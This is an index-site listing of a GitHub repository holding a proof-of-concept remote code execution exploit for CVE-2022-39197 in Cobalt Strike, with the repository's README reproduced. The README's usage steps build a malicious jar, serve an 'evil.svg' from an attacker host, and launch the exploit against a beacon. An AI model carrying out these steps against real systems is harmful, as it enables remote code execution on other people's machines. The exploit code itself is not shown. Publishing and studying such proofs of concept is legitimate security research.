Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/its-arun/CVE-2022-39197
CobaltStrike <= 4.7.1 RCE
https://github.com/its-arun/CVE-2022-39197
Last synced: about 2 months ago
JSON representation
CobaltStrike <= 4.7.1 RCE
- Host: GitHub
- URL: https://github.com/its-arun/CVE-2022-39197
- Owner: its-arun
- Created: 2022-10-14T11:46:01.000Z (over 2 years ago)
- Default Branch: master
- Last Pushed: 2022-10-25T05:32:54.000Z (about 2 years ago)
- Last Synced: 2024-08-05T17:43:42.120Z (5 months ago)
- Language: Python
- Homepage:
- Size: 101 KB
- Stars: 374
- Watchers: 7
- Forks: 77
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - its-arun/CVE-2022-39197 - CobaltStrike <= 4.7.1 RCE (Python)
README
# **CVE-2022-39197 RCE POC**
### Usage
- **Prepare Payload**
1. Edit `Line 19` with your payload in `EvilJar/src/main/java/Exploit.java`
2. Build using jar `mvn clean compile assembly:single`
3. Move `EvilJar-1.0-jar-with-dependencies.jar` from `EvilJar/target/` to `serve/` folder
4. Edit `serve\evil.svg` replace `[attacker]`
5. Serve using `python3 -m http.server 8080`- **Execute Exploit**
```
python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg
```Payload will be triggered as soon as the user scrolls through Process List
### POC.JPG?
![1.jpg](./images/1.jpg)### Reference Links
[https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg](https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg) — There’s a great in depth analysis of this vulnerability
[https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html](https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html)